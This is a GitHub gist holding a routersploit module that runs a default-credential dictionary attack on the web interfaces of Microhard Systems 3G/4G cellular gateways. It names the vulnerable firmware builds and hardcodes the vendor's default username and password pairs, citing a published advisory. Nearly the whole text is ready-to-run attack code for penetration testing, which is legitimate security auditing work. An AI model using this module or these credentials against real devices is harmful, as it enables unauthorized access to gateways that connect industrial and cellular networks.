Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Save paralax/a36d0f8971e82618ebe2c7608e07df2c to your computer and use it in GitHub Desktop.
Save paralax/a36d0f8971e82618ebe2c7608e07df2c to your computer and use it in GitHub Desktop.
routersploit module - Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Default Creds
from routersploit.core.exploit import *
from routersploit.modules.creds.generic.http_basic_digest_default import Exploit as HTTPBasicDigestDefault
class Exploit(HTTPBasicDigestDefault):
__info__ = {
"name": "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Default Creds - HTTP Auth",
"description": "Module performs dictionary attack against Microhard Systems "
"3G/4G Cellular Ethernet and Serial Gateway web interface. "
"If valid credentials are found, they are displayed to the user.",
"authors": (
"Gjoko 'LiquidWorm' Krstic",
"@zeroscience",
"@jnazario", # routersploit module
),
"references": (
"https://www.exploit-db.com/exploits/45040/",
"https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5480.php"
),
"devices": (
'IPn4G 1.1.0 build 1098',
'IPn3Gb 2.2.0 build 2160',
'IPn4Gb 1.1.6 build 1184-14',
'IPn4Gb 1.1.0 Rev 2 build 1090-2',
'IPn4Gb 1.1.0 Rev 2 build 1086',
'Bullet-3G 1.2.0 Rev A build 1032',
'VIP4Gb 1.1.6 build 1204',
'VIP4G 1.1.6 Rev 3.0 build 1184-14',
'VIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196',
'IPn3Gii / Bullet-3G 1.2.0 build 1076',
'IPn4Gii / Bullet-LTE 1.2.0 build 1078',
'BulletPlus 1.3.0 build 1036',
'Dragon-LTE 1.1.0 build 1036'
),
}
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
port = OptPort(80, "Target HTTP port")
path = OptString("/", "Target path")
threads = OptInteger(1, "Number of threads")
default = OptWordlist("upgrade:admin,testlab:testlab,testlab1:testlab1,admin:admin,msshc:msshc", "User:Pass or file with default credentials (file://)")
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment